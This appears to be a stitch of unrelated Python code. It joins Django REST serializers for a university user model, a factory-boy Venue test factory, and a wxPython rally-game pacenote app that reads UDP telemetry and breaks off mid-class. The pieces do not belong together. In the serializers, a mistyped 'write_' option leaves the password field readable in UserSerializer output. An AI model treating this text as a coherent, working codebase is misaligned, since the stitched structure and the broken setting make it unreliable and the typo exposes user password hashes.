User.objects.get(code=code) class DeleteUserSerializer(serializers.ModelSerializer): class Meta(object): model = User fields = ('email', 'password',) def delete(self, request, pk=None, **kwargs): request.user.is_active = False request.user.save() return Response(status=204) class TeacherSerializer(serializers.ModelSerializer): faculty = FacultySerializer(many=False) class Meta(object): model = Teacher fields = ( 'user', 'faculty', ) class StudentSerializer(serializers.ModelSerializer): faculty = FacultySerializer(many=False) profession = ProfessionSerializer(many=False) acad_group = ACAD_GROUPS_CHOICES class Meta(object): model = Student fields = ( 'user', 'faculty', 'profession', 'acad_group', ) class FindUserSerializer(serializers.ModelSerializer): date_joined = serializers.ReadOnlyField() email = serializers.ReadOnlyField() student = StudentSerializer(many=False, read_only=True) teacher = TeacherSerializer(many=False, read_only=True) class Meta(object): model = User fields = ( 'id', 'email', 'first_name', 'last_name', 'patronymic', 'bio', 'avatar', 'date_of_birth', 'date_joined', 'last_update', 'news_subscription', 'is_moderator', 'is_active', 'is_admin', 'is_student', 'is_teacher', 'student', 'teacher', ) class UserSerializer(serializers.ModelSerializer): date_of_birth = serializers.ReadOnlyField() student = StudentSerializer(many=False, read_only=True) teacher = TeacherSerializer(many=False, read_only=True) class Meta(object): model = User fields = ( 'id', 'email', 'first_name', 'last_name', 'patronymic', 'bio', 'avatar', 'date_of_birth', 'date_joined', 'last_update', 'news_subscription', 'is_active', 'is_admin', 'is_moderator', 'user_permissions', 'is_student', 'is_teacher', 'student', 'teacher', 'password', ) extra_kwargs = {'password': {'write_': True}} class UpdateUserSerializer(serializers.ModelSerializer): class Meta(object): model = User fields = ( 'email', 'first_name', 'last_name', 'patronymic', 'bio', 'news_subscription' ) class BulkUpdateUserSerializer(serializers.ModelSerializer): class Meta(object): model = User fields = ('first_name', 'last_name', 'patronymic', 'bio', 'avatar', 'date_of_birth', 'news_subscription', 'user_permissions') class DeleteAllSerializer(serializers.ModelSerializer): class Meta(object): model = User fields = ('email', 'password') class CreateTeacherSerializer(serializers.ModelSerializer): faculty = serializers.CharField(max_length=128) read_only_fields = ('date_joined',) class Meta(object): model = User fields = ( 'email', 'password', 'faculty', ) class UpdateTeacherSerializer(serializers.ModelSerializer): faculty = FacultySerializer(many=False, read_only=True) class Meta(object): model = Teacher fields = ('faculty',) def save(self, user, data): try: name = data.get('faculty').get('name') f = Faculty.objects.get(name=name) user.faculty = f user.save() except Faculty.DoesNotExist: raise ValueError("Faculty does not exist") class CreateStudentSerializer(serializers.ModelSerializer): faculty = serializers.CharField(max_length=128) profession = serializers.CharField(max_length=128) acad_group = serializers.CharField(max_length=128) read_only_fields = ('date_joined',) class Meta(object): model = User fields = ( 'email', 'password', 'faculty', 'profession', 'acad_group', ) class UpdateStudentSerializer(serializers.ModelSerializer): faculty = FacultySerializer(many=False, read_only=True) profession = ProfessionSerializer(many=False, read_only=True) class Meta(object): model = Student fields = ( 'faculty', 'profession', 'acad_group',) def save(self, user, data): try: name = data.get('faculty').get('name') f = Faculty.objects.get(name=name) user.faculty = f name2 = data.get('profession').get('name') f2 = Profession.objects.get(name=name2) user.profession = f2 name3 = data.get('acad_group') i=list(ACAD_GROUPS_CHOICES) for x in i: if user.acad_group == x[0] and x[0] == name3: user.save() elif x[0]==name3: user.acad_group=x[0] user.save() except Faculty.DoesNotExist: raise ValueError("Faculty or Profession does not exist ") class SetModeratorSerializer(serializers.ModelSerializer): class Meta(object): model = User fields = ( 'id','is_moderator',) class NewsSubscriptionSerializer(serializers.ModelSerializer): class Meta(object): model = User fields = ( 'id', 'news_subscription',) """Factories to help in venue tests.""" from factory import Sequence, SubFactory from muckr_api.venue.models import Venue from tests.factories import BaseFactory from tests.user.factories import UserFactory class VenueFactory(BaseFactory): """Venue factory.""" name = Sequence(lambda n: "venue{0}".format(n)) city = Sequence(lambda n: "city{0}".format(n)) country = Sequence(lambda n: "country{0}".format(n)) user = SubFactory(UserFactory) class Meta: """Factory configuration.""" model = Venue #!python3 # # DiRTy Pacenotes # # Copyright [2017 - 2019] [] # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import csv import glob import os import socket import struct import sys import itertools import ast import math import win32gui, win32con import wx import wx.adv import wx.aui import wx.grid import wx.lib.intctrl as ict import wx.lib.scrolledpanel as scr import wx.lib.agw.ultimatelistctrl as ulc import wx.lib.agw.flatnotebook as fnb import wx.lib.agw.persist as per from wx.lib.wordwrap import wordwrap from pubsub import pub from collections import defaultdict, OrderedDict from configobj import ConfigObj from threading import Thread from queue import Queue from pydub import AudioSegment from pydub.playback import play from pathlib import Path hide = win32gui.GetForegroundWindow() win32gui.ShowWindow(hide, win32con.SW_HIDE) app_path = os.getcwd() data_path = os.path.join(app_path, 'data') img_path = os.path.join(data_path, 'images') config_ini = os.path.join(data_path, 'config.ini') sound_bank = {} q_snd = Queue() q_run = Queue() q_rst = Queue() q_del = Queue() q_vol = Queue() q_dic = Queue() q_cfg = Queue() q_stg = Queue() # UDP server class Reader(Thread): def __init__(self): Thread.__init__(self) if not q_cfg.empty(): config = q_cfg.get_nowait() q_cfg.task_done() self.server = config[0] self.co_driver = config[1] self.delay = config[2] self.volume = config[3] self.countdown = config[4] co_path = os.path.join(app_path, 'co-drivers', self.co_driver) self.pace_path = os.path.join(co_path, 'pacenotes') self.snd_path = os.path.join(co_path, 'sounds') if not q_stg.empty(): self.dic_stages = q_stg.get_nowait() q_stg.task_done() self.dic_pacenotes = OrderedDict() self.dic_new_pacenotes = OrderedDict() self.new_dist = 0 self.pos_y = 0 self.total_laps = 0 self.lap_time = 0 self.stage_length = 0 self.snd_ext = '' self.stage_path = '' self.stage_name = '' self.stage_name_dic = '' self.stage_folder = '' self.stage_file = '' self.count_played = False self.restart = False self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.sock.bind(self.server) self.running = True self.setDaemon(True) self.start() def run(self): try: snd_file_list = q_snd.get_nowait() loaded = 0 for snd_file in snd_file_list: sound = Path(snd_file).stem snd, self.snd_ext = os.path.splitext(snd_file) try: sound_bank[sound] = AudioSegment.from_file(snd_file) except IndexError: continue loaded += 1 wx.CallAfter(pub.sendMessage, 'get_progress', arg=loaded) except IOError: pass while self.running: self.receive_udp_packet() # Has its own breakable while loop. self.detect_stage() self.read_pacenotes_file() self.receive_udp_stream() # Has its own infinite while loop. self.sock.shutdown(socket.SHUT_RD) self.sock.close() # Perform initial UDP detection. def receive_udp_packet(self): while True: udp_stream = self.sock.recv(512) if not udp_stream: break # lost connection udp_data = struct.unpack('64f', udp_stream[0:256]) total_time = int(udp_data[0]) self.pos_y = int(udp_data[5]) curr_lap = int(udp_data[59]) self.total_laps = int(udp_data[60]) self.stage_length = round(udp_data[61], 4) # wx.CallAfter(pub.sendMessage, 'get_stage_length', arg=self.stage_length) if total_time == 0 != curr_lap: # Wait for udp from next stage after finish. continue break # Detect stage. def detect_stage(self): for k, v in list(self.dic_stages.items()): if self.stage_length == k and self.total_laps == 1: # Rally stage indicator. for s in v: if len(v) == 1: stg = s.split(',') self.stage_name_dic = stg[1] self.stage_folder = stg[2] elif len(v) == 2: stg = s.split(',') pos_start = int(stg[0]) if self.pos_y == pos_start: self.stage_name_dic = stg[1] self.stage_folder = stg[2] if self.stage_name_dic != self.stage_name: self.stage_name = self.stage_name_dic self.stage_path = os.path.join(self.pace_path, self.stage_folder) self.stage_file = os.path.join(self.stage_path, self.stage_name + '.txt') wx.CallAfter(pub.sendMessage, 'get_stage', arg1=self.stage_name, arg2=self.stage_path) # Read pacenotes file. def read_pacenotes_file(self): self.dic_pacenotes.clear() with open(self.stage_file, 'r') as f: for line in f: if line and line.strip(): lis = line.split(',') # list [curr_dist, sound] key = int(lis[0]) # key as integer val = lis[1].strip() # value as string self.dic_pacenotes[key] = [] # empty list self.dic_pacenotes[key].append(val) # dictionary else: continue # skip empty lines # Receive UDP stream. def receive_udp_stream(self): last_dist = -20 last_time = 0 # Play countdown sound. try: if self.countdown and not self.count_played and last_time == 0: sound_count = sound_bank['countdown_start'] + self.volume play(sound_count) self.count_played = True except KeyError: wx.CallAfter(pub.sendMessage, 'key_error', arg='countdown_start') return while self.running: if not q_run.empty(): self.running = q_run.get_nowait() q_run.task_done() if not q_rst.empty(): reset = q_rst.get_nowait() q_rst.task_done() if reset is True: return if not q_del.empty(): self.delay = q_del.get_nowait() q_del.task_done() if not q_vol.empty(): self.volume = q_vol.get_nowait() q_vol.task_done() if not q_dic.empty(): self.dic_pacenotes.clear() dic_pace = q_dic.get_nowait() q_dic.task_done() for key, val in list(dic_pace.items()): self.dic_pacenotes[int(key)] = [] self.dic_pacenotes[int(key)].append(val.strip()) udp_stream = self.sock.recv(512) if not udp_stream: break # lost connection udp_data = struct.unpack('64f', udp_stream[0:256]) total_time = udp_data[0] lap_time = int(udp_data[1]) curr_dist = int(udp_data[2]) curr_lap = int(udp_data[59]) if total_time == last_time and lap_time == 0: self.restart = True else: self.restart = False wx.CallAfter(pub.sendMessage, 'get_pause', arg=self.restart) # Play sounds. if lap_time > 0: # Timing clock started. self.count_played = False if curr_lap == 0: # Car on stage but before finish line. wx.CallAfter(pub.sendMessage, 'get_dist', arg1=curr_dist, arg2=last_dist) self.dic_new_pacenotes.clear() for dist, pace in list(self.dic_pacenotes.items()): if curr_dist < self.delay: self.new_dist = math.ceil(dist / 2) elif curr_dist >= self.delay: self.new_dist = dist - self.delay self.dic_new_pacenotes[self.new_dist] = pace for new_dist, new_pace in list(self.dic_new_pacenotes.items()): if curr_dist == new_dist: if curr_dist > last_dist: # Play pacenotes. for curr_pace in new_pace: snd = curr_pace.split() for sound_name in snd: try: sound_pace = sound_bank[sound_name] + self.volume play(sound_pace) except KeyError: wx.CallAfter(pub.sendMessage, 'key_error', arg=sound_name) pass elif 0 < curr_dist < last_dist: # Play wrong_way. try: sound_wrong = sound_bank['wrong_way'] + self.volume play(sound_wrong) except KeyError: wx.CallAfter(pub.sendMessage, 'key_error', arg='wrong_way') pass elif curr_lap == 1: # Stage is finished. break last_dist = curr_dist elif lap_time == 0: # Timing clock not started. break last_time = total_time class MenuBar(wx.MenuBar): def __init__(self, parent): super(MenuBar, self).__init__() self.parent = parent # File Menu. self.file_menu = wx.Menu() self.menu_open = wx.MenuItem(self.file_menu, wx.ID_OPEN, wx.GetStockLabel(wx.ID_OPEN) + '\tCtrl+O', 'Open existing pacenotes file') self.menu_open.SetBitmap(wx.Bitmap(os.path.join(img_path, 'open.png'))) self.menu_save = wx.MenuItem(self.file_menu, wx.ID_SAVE, wx.GetStockLabel(wx.ID_SAVE) + '\tCtrl+S', 'Overwrite current pacenotes file') self.menu_save.SetBitmap(wx.Bitmap(os.path.join(img_path, 'save.png'))) self.menu_creator = wx.MenuItem(self.file_menu, wx.ID_ANY, 'Creator' + '\tCtrl+R', 'Change co-driver pacenote commands') self.menu_creator.SetBitmap(wx.Bitmap(os.path.join(img_path, 'settings.png'))) self.menu_settings = wx.MenuItem(self.file_menu, wx.ID_ANY, 'Settings' + '\tCtrl+T', 'Change app settings') self.menu_settings.SetBitmap(wx.Bitmap(os.path.join(img_path, 'settings.png'))) self.menu_quit = wx.MenuItem(self.file_menu, wx.ID_EXIT, wx.GetStockLabel(wx.ID_EXIT) + '\tCtrl+Q', 'Close the app') self.menu_quit.SetBitmap(wx.Bitmap(os.path.join(img_path, 'exit.png'))) self.file_menu.Append(self.menu_open) self.file_menu.Append(self.menu_save) self.file_menu.AppendSeparator() self.file_menu.Append(self.menu_creator) self.file_menu.Append(self.menu_settings) self.file_menu.AppendSeparator() self.file_menu.Append(self.menu_quit) self.menu_save.Enable(False) self.Bind(wx.EVT_MENU, self.parent.on_open, self.menu_open) self.Bind(wx.EVT_MENU, self.parent.on_save, self.menu_save) self.Bind(wx.EVT_MENU, self.parent.on_creator, self.menu_creator) self.Bind(wx.EVT_MENU, self.parent.on_settings, self.menu_settings) self.Bind(wx.EVT_MENU, self.parent.on_quit, self.menu_quit) # Edit Menu. self.edit_menu = wx.Menu() # self.menu_cut = wx.MenuItem(self.file_menu, wx.ID_CUT, wx.GetStockLabel(wx.ID_CUT) + '\tCtrl+X', # 'Cut selected text') # self.menu_cut.SetBitmap(wx.Bitmap('data/images/cut.png', wx.BITMAP_TYPE_PNG)) # self.menu_copy = wx.MenuItem(self.file_menu, wx.ID_COPY, wx.GetStockLabel(wx.ID_COPY) + '\tCtrl+C', # 'Copy selected text') # self.menu_copy.SetBitmap(wx.Bitmap('data/images/copy.png', wx.BITMAP_TYPE_PNG)) # self.menu_paste = wx.MenuItem(self.file_menu, wx.ID_PASTE, wx.GetStockLabel(wx.ID_PASTE) + '\tCtrl+V', # 'Paste text from clipboard') # self.menu_paste.SetBitmap(wx.Bitmap('data/images/paste.png', wx.BITMAP_TYPE_PNG)) # self.menu_delete = wx.MenuItem(self.file_menu, wx.ID_DELETE, wx.GetStockLabel(wx.ID_DELETE) + '\tDel', # 'Delete selected text') # self.menu_delete.SetBitmap(wx.Bitmap('data/images/delete.png', wx.BITMAP_TYPE_PNG)) self.menu_select_all = wx.MenuItem(self.file_menu, 20000, 'Select All', 'Select all lines of pacenotes', wx.ITEM_CHECK) # self.edit_menu.Append(self.menu_cut) # self.edit_menu.Append(self.menu_copy) # self.edit_menu.Append(self.menu_paste) # self.edit_menu.AppendSeparator() # self.edit_menu.Append(self.menu_delete) self.edit_menu.Append(self.menu_select_all) # self.Bind(wx.EVT_TEXT_CUT, self.menu_cut) # self.Bind(wx.EVT_TEXT_COPY, self.menu_copy) # self.Bind(wx.EVT_TEXT_PASTE, self.menu_paste) # self.Bind(wx.EVT_TEXT, self.menu_delete) self.Bind(wx.EVT_MENU, self.parent.on_tick, self.menu_select_all) # Autosave Menu. self.autosave_menu = wx.Menu() self.radio_off = self.autosave_menu.AppendRadioItem(1000, 'OFF') self.radio_two = self.autosave_menu.AppendRadioItem(2, '2 min') self.radio_five = self.autosave_menu.AppendRadioItem(5, '5 min') self.radio_ten = self.autosave_menu.AppendRadioItem(10, '10 min') for radio in [self.radio_off, self.radio_two, self.radio_five, self.radio_ten]: if int(self.parent.interval) == radio.GetId(): radio.Check() self.Bind(wx.EVT_MENU, self.parent.on_interval, radio) # Delay Menu. self.delay_menu = wx.Menu() self.delay_recce = self.delay_menu.AppendRadioItem(100, 'Recce') self.delay_late = self.delay_menu.AppendRadioItem(150, 'Late') self.delay_normal = self.delay_menu.AppendRadioItem(200, 'Normal') self.delay_earlier = self.delay_menu.AppendRadioItem(250, 'Earlier') self.delay_early = self.delay_menu.AppendRadioItem(300, 'Very Early') for radio in [self.delay_recce, self.delay_late, self.delay_normal, self.delay_earlier, self.delay_early]: if self.parent.delay == radio.GetId(): radio.Check() self.Bind(wx.EVT_MENU, self.parent.on_delay, radio) # self.delay_menu.InsertSeparator(4) # Help Menu. self.help_menu = wx.Menu() self.menu_about = wx.MenuItem(self.help_menu, wx.ID_ABOUT, wx.GetStockLabel(wx.ID_ABOUT), 'About this app') self.menu_about.SetBitmap(wx.Bitmap(os.path.join(img_path, 'about.png'))) self.help_menu.Append(self.menu_about) self.Bind(wx.EVT_MENU, self.parent.on_about, self.menu_about) class TaskBar(wx.adv.TaskBarIcon): def __init__(self, frame): wx.adv.TaskBarIcon.__init__(self) self.frame = frame self.SetIcon(frame.icon, frame.title) self.Bind(wx.EVT_MENU, self.on_show, id=1) self.Bind(wx.EVT_MENU, self.on_hide, id=2) self.Bind(wx.EVT_MENU, self.on_close, id=3) def CreatePopupMenu(self): menu = wx.Menu() menu.Append(1, 'Show') menu.Append(2, 'Hide') menu.Append(3, 'Close') return menu def on_show(self, event): if not self.frame.IsShown(): self.frame.Show() def on_hide(self, event): if self.frame.IsShown(): self.frame.Hide() def on_close(self, event): self.frame.Close() class HandInput(wx.Dialog): # not used at the moment def __init__(self, parent): wx.Dialog.__init__(self, parent) self.parent = parent self.SetSize(wx.Size(180, 80)) self.SetTitle('DiRTy Handbrake') self.SetIcon(self.parent.icon) self.Center(wx.BOTH) panel = wx.Panel(self, name='panel_handbrake') box_main = wx.BoxSizer(wx.HORIZONTAL) label_handbrake = wx.StaticText(panel, 0, 'APPLY HANDBRAKE') box_main.Add(label_handbrake, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALL, 15) panel.SetSizer(box_main) # self.SetReturnCode() class TextDropTarget(wx.TextDropTarget): def __init__(self, target): wx.TextDropTarget.__init__(self) self.target = target def OnDropText(self, x, y, data): self.target.InsertItem(sys.maxsize, data) return True class Settings(wx.Dialog): def __init__(self, parent): wx.Dialog.__init__(self, parent) self.parent = parent self.SetSize(wx.Size(260, 340)) self.SetTitle('DiRTy Pacenotes - Service Area') self.SetIcon(self.parent.icon) self.Center(wx.BOTH) panel = wx.Panel(self, name='panel_settings') box_main = wx.BoxSizer(wx.VERTICAL) box_server = wx.StaticBox(panel, 0, 'UDP SERVER') sbs_server = wx.StaticBoxSizer(box_server) label_ip = wx.StaticText(panel, 0, 'IP') self.ip_value = wx.TextCtrl(panel, size=wx.Size(60, 23)) self.ip_value.SetValue(self.parent.ip) sbs_server.Add(label_ip, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT, 10) sbs_server.Add(self.ip_value, 0, wx.ALL, 10) label_port = wx.StaticText(panel, 0, 'Port') self.port_value = ict.IntCtrl(panel, size=wx.Size(45, 23), min=10000, max=99999, value=self.parent.port, limited=True, allow_none=True) self.port_value.SetValue(self.parent.port) sbs_server.Add(label_port, 0, wx.ALIGN_CENTER_VERTICAL) sbs_server.Add(self.port_value, 0, wx.ALL, 10) box_co_driver = wx.StaticBox(panel, 0, 'CO-DRIVER') sbs_co_driver = wx.StaticBoxSizer(box_co_driver) co_drivers = os.listdir('co-drivers') self.combo_co_driver = wx.ComboBox(panel, choices=co_drivers, style=wx.CB_READONLY) self.combo_co_driver.SetValue(self.parent.co_driver) self.combo_co_driver.SetFocus() sbs_co_driver.Add(self.combo_co_driver, 0, wx.ALL, 10) box_countdown = wx.BoxSizer(wx.HORIZONTAL) self.count_check = wx.CheckBox(panel, 0, 'COUNTDOWN') self.count_check.SetValue(bool(self.parent.countdown)) box_countdown.Add(self.count_check, 0, wx.ALL, 10) ''' box_handbrake = wx.StaticBox(panel, 0, 'HANDBRAKE') sbs_handbrake = wx.StaticBoxSizer(box_handbrake) button_handbrake = wx.Button(panel, wx.ID_ANY, 'CHANGE') button_handbrake.Bind(wx.EVT_BUTTON, self.parent.on_change_handbrake) self.handbrake_value = wx.TextCtrl(panel, size=wx.Size(60, 23)) self.handbrake_value.SetValue(self.parent.handbrake) sbs_handbrake.Add(self.handbrake_value, 0, wx.ALL, 10) sbs_handbrake.Add(button_handbrake, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT, 10) ''' bs_buttons = wx.BoxSizer(wx.HORIZONTAL) button_reload = wx.Button(panel, id=2, label='SAVE and RELOAD') button_reload.Bind(wx.EVT_BUTTON, self.parent.on_reload) bs_buttons.Add(button_reload, 0) box_main.Add(sbs_server, 0, wx.ALL, 20) box_main.Add(sbs_co_driver, 0, wx.LEFT, 20) box_main.Add(box_countdown, 0, wx.LEFT, 20) # box_main.Add(sbs_handbrake, 0, wx.LEFT | wx.RIGHT, 20) box_main.Add(bs_buttons, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.TOP, 20) panel.SetSizer(box_main) class Creator(wx.Dialog): def __init__(self, parent): wx.Dialog.__init__(self, parent) self.parent = parent self.SetSize(wx.Size(640, 480)) self.SetTitle('DiRTy Pacenotes - ' + self.parent.co_driver) self.SetBackgroundColour('light grey') self.SetIcon(self.parent.icon) self.Center(wx.BOTH) self.SetWindowStyle(wx.DEFAULT_DIALOG_STYLE) self.dict_list_c = {} self.cat_list_c = [] self.sound_list_c = [] self.audio_list_c = [] self.selection_left = [] self.selection_right = [] panel_sizer = wx.BoxSizer(wx.HORIZONTAL) # Left side box_left = wx.BoxSizer(wx.HORIZONTAL) self.tabs_left = fnb.FlatNotebook(self, agwStyle=fnb.FNB_HIDE_ON_SINGLE_TAB) box_left.Add(self.tabs_left, 1, wx.EXPAND) # Right side box_right = wx.BoxSizer(wx.VERTICAL) # Panel with buttons (right top) box_but_top = wx.BoxSizer(wx.HORIZONTAL) box_but_bot = wx.BoxSizer(wx.HORIZONTAL) self.button_in = wx.Button(self, wx.ID_ANY, label=u'IN') self.button_out = wx.Button(self, wx.ID_ANY, label=u'OUT') button_add = wx.Button(self, wx.ID_ANY, label='ADD CATEGORY') button_reload = wx.Button(self, id=1, label='SAVE and RELOAD') button_reset = wx.Button(self, wx.ID_ANY, label='RESET SOUNDS') self.button_in.Disable() self.button_out.Disable() box_but_top.Add(self.button_in, 0, wx.ALL, 5) box_but_top.Add(self.button_out, 0, wx.ALL, 5) box_but_top.Add(button_add, 0, wx.ALL, 5) box_but_bot.Add(button_reset, 0, wx.ALL, 5) box_but_bot.Add(button_reload, 0, wx.ALL, 5) self.button_in.Bind(wx.EVT_BUTTON, self.parent.sounds_in) self.button_out.Bind(wx.EVT_BUTTON, self.parent.sounds_out) button_reset.Bind(wx.EVT_BUTTON, self.parent.reset_sounds) button_reload.Bind(wx.EVT_BUTTON, self.parent.on_reload) button_add.Bind(wx.EVT_BUTTON, self.parent.add_category) # Panel with categories (right bottom) box_cat = wx.BoxSizer(wx.HORIZONTAL) self.tabs_right = wx.aui.AuiNotebook(self, style=wx.aui.AUI_NB_WINDOWLIST_BUTTON | wx.aui.AUI_NB_TAB_MOVE | wx.aui.AUI_NB_SCROLL_BUTTONS | wx.aui.AUI_NB_CLOSE_BUTTON) self.tabs_right.Bind(wx.aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.parent.on_tab_close) box_cat.Add(self.tabs_right, 1, wx.EXPAND) box_right.Add(box_but_top, 0, wx.ALIGN_CENTER_HORIZONTAL) box_right.Add(box_cat, 2, wx.EXPAND | wx.ALL, 5) box_right.Add(box_but_bot, 0, wx.ALIGN_CENTER_HORIZONTAL) # Add sizers to panel_sizer. panel_sizer.Add(box_left, 1, wx.EXPAND | wx.ALL, 10) panel_sizer.Add(box_right, 0, wx.EXPAND | wx.ALL, 10) self.SetSizer(panel_sizer) self.create_audio() self.create_sounds() # Define methods. def create_audio(self): self.tabs_left.DeleteAllPages() for s in os.listdir(self.parent.sound_path): (name, ext) = s.split('.') self.audio_list_c.append(name) for sublist in list(self.parent.sound_list.values()): for item in sublist: self.sound_list_c.append(item) audio_list_final = self.parent.diff(self.audio_list_c, self.sound_list_c) audio_list_final.sort() tab_left = wx.Panel(self.tabs_left, style=wx.BORDER_NONE, id=1) tab_left.SetBackgroundColour('white') tab_left.SetCursor(wx.Cursor(wx.CURSOR_HAND)) list_box_left = wx.ListBox(tab_left, choices=audio_list_final, style=wx.LB_MULTIPLE) h_box_tabs = wx.BoxSizer(wx.HORIZONTAL) h_box_tabs.Add(list_box_left, 0, wx.EXPAND) tab_left.SetSizer(h_box_tabs) list_box_left.Bind(wx.EVT_LISTBOX, self.parent.on_listbox_left) self.tabs_left.AddPage(tab_left, 'audio') def create_sounds(self): self.tabs_right.DeleteAllPages() for category, sounds_list in list(self.parent.sound_list.items()): tab_right = wx.Panel(self.tabs_right, style=wx.TAB_TRAVERSAL | wx.BORDER_NONE, name=category, id=2) tab_right.SetBackgroundColour('white') tab_right.SetCursor(wx.Cursor(wx.CURSOR_HAND)) list_box_right = wx.ListBox(tab_right, choices=sounds_list, style=wx.LB_MULTIPLE) h_box_tabs = wx.BoxSizer(wx.HORIZONTAL) h_box_tabs.Add(list_box_right, 0, wx.EXPAND) tab_right.SetSizer(h_box_tabs) list_box_right.Bind(wx.EVT_LISTBOX, self.parent.on_listbox_right) self.tabs_right.AddPage(tab_right, category) class Editor(wx.Window): def __init__(self, parent): wx.Window.__init__(self, parent) self.parent = parent self.SetBackgroundColour('white') self.SetWindowStyle(wx.BORDER_THEME) # SCROLLED PANEL # self.scrolled_panel = scr.ScrolledPanel(self, style=wx.BORDER_NONE) self.scrolled_panel.SetupScrolling(scroll_x=False, rate_y=8, scrollToTop=False) self.scrolled_panel.SetBackgroundColour('white') self.scrolled_panel.SetAutoLayout(1) logo = wx.StaticBitmap(self.scrolled_panel) logo.SetBitmap(wx.Bitmap(os.path.join(img_path, 'logo.png'))) self.v_box = wx.BoxSizer(wx.VERTICAL) self.scrolled_panel.SetSizer(self.v_box) # BUTTONS # self.button_add = wx.Button(self, label='ADD') self.button_insert = wx.Button(self, label='INSERT') self.button_replace = wx.Button(self, label='REPLACE') self.button_delete = wx.Button(self, label='DELETE') # self.button_undo_pace = but.GenBitmapButton(self, bitmap=wx.Bitmap( # os.path.join(img_path, 'undo.png')), size=(25, 25)) self.buttons = (self.button_add, self.button_insert, self.button_replace, self.button_delete) for button in self.buttons: button.Disable() self.h_box_buttons = wx.BoxSizer(wx.HORIZONTAL) self.h_box_buttons.Add(self.button_add, 0, wx.RIGHT, 24) self.h_box_buttons.Add(self.button_insert, 0, wx.RIGHT, 24) self.h_box_buttons.Add(self.button_replace, 0, wx.RIGHT, 24) self.h_box_buttons.Add(self.button_delete, 0) # self.h_box_buttons.Add(self.button_undo_pace, 0, wx.RIGHT, 10) self.Bind(wx.EVT_BUTTON, self.parent.on_add, self.button_add) self.Bind(wx.EVT_BUTTON, self.parent.on_insert, self.button_insert) self.Bind(wx.EVT_BUTTON, self.parent.on_replace, self.button_replace) self.Bind(wx.EVT_BUTTON, self.parent.on_delete, self.button_delete) # INPUT BOXES # self.input_dist = ict.IntCtrl(self, name='input', size=wx.Size(45, 23), min=0, max=19999, limited=True, allow_none=False) self.input_dist.Disable() self.input_pace = wx.SearchCtrl(self, style=wx.TE_READONLY, size=wx.Size(0, 23)) self.input_pace.SetCancelBitmap(wx.Bitmap(os.path.join(img_path, 'clear.png'))) self.input_pace.SetCursor(wx.Cursor(wx.CURSOR_ARROW)) self.input_pace.ShowSearchButton(False) self.input_pace.ShowCancelButton(True) self.input_pace.SetHint('pacenotes') self.input_pace.Bind(wx.EVT_SEARCHCTRL_CANCEL_BTN, self.parent.on_cancel) self.button_play = wx.Button(self) self.button_play.SetInitialSize(wx.Size(24, 24)) self.button_play.SetBitmap(wx.Bitmap(os.path.join(img_path, 'sound_on.png'))) # button_sound.SetBitmapPressed(wx.Bitmap(os.path.join(img_path, 'sound_off.png'))) self.button_play.Disable() self.h_box_input = wx.BoxSizer(wx.HORIZONTAL) self.h_box_input.Add(self.input_dist, 0) self.h_box_input.Add(self.input_pace, 1, wx.RIGHT, 10) self.h_box_input.Add(self.button_play, 0) self.input_dist.Bind(wx.lib.intctrl.EVT_INT, self.parent.on_distance) self.button_play.Bind(wx.EVT_BUTTON, self.parent.on_play) # self.input_dist.Bind(wx.EVT_KEY_UP, self.on_distance) # Keyboard. # self.input_dist.Bind(wx.EVT_TEXT, self.on_distance) # UDP stream. # LABELS # self.label_co_driver = wx.StaticText(self, label=self.parent.co_driver + ' |') self.label_co_driver.SetForegroundColour('dark grey') self.label_co_driver.SetFont(self.parent.font.Bold()) self.label_delay = wx.StaticText(self, label=self.parent.delay_mode) self.label_delay.SetFont(self.parent.font.Bold()) self.label_delay.SetForegroundColour('dark grey') # ONLY FOR GETTING TRACK LENGTH # # self.label_length = wx.StaticText(self) # self.label_length.SetFont(self.parent.font.Bold()) # self.label_length.SetForegroundColour('white') # self.label_length.Bind(wx.lib.intctrl.EVT_INT, self.parent.update_length, self.label_length) label_volume = wx.StaticText(self, label='vol') label_volume.SetForegroundColour('dark grey') self.slider_volume = wx.Slider(self, wx.ID_ANY, int(self.parent.volume), 0, 10, wx.DefaultPosition, (100, 0), wx.SL_MIN_MAX_LABELS) self.slider_volume.SetTickFreq(1) self.slider_volume.SetForegroundColour('dark grey') self.slider_volume.Disable() self.slider_volume.Bind(wx.EVT_SLIDER, self.parent.on_slider) self.h_box_labels = wx.BoxSizer(wx.HORIZONTAL) self.h_box_labels.Add(self.label_co_driver, 0, wx.LEFT | wx.RIGHT, 10) self.h_box_labels.Add(self.label_delay, 0, wx.RIGHT, 10) # self.h_box_labels.Add(self.label_length, 0, wx.TEXT_ALIGNMENT_CENTER) self.h_box_labels.AddStretchSpacer(1) self.h_box_labels.Add(label_volume, 0, wx.ALIGN_RIGHT) self.h_box_labels.Add(self.slider_volume, 0, wx.ALIGN_RIGHT | wx.LEFT | wx.RIGHT, 10) # TABS NOTEBOOK # self.tabs = wx.aui.AuiNotebook(self, style=wx.aui.AUI_NB_WINDOWLIST_BUTTON | wx.aui.AUI_NB_SCROLL_BUTTONS) # self.tabs.SetName('Sounds') # Add sizers to panel_sizer. panel_sizer = wx.BoxSizer(wx.VERTICAL) panel_sizer.Add(self.scrolled_panel, 1, wx.EXPAND | wx.ALL, 10) panel_sizer.AddSpacer(5) panel_sizer.Add(self.h_box_buttons, 0, wx.EXPAND | wx.ALIGN_LEFT | wx.LEFT, 20) panel_sizer.AddSpacer(5) panel_sizer.Add(self.h_box_input, 0, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 10) panel_sizer.AddSpacer(5) panel_sizer.Add(self.h_box_labels, 0, wx.EXPAND | wx.ALL, 10) panel_sizer.AddSpacer(5) panel_sizer.Add(self.tabs, 1, wx.EXPAND | wx.RIGHT | wx.LEFT | wx.BOTTOM, 10) self.SetSizer(panel_sizer) class DiRTyPacenotes(wx.Frame): def __init__(self, *args, **kwargs): super(DiRTyPacenotes, self).__init__(*args, **kwargs) 